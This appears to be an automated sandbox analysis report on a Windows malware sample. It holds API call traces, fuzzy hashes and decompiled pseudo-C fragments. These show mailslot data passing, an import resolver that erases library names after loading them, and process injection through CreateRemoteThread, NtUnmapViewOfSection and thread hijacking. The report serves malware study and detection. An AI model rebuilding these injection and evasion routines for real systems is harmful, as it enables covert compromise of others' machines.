  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
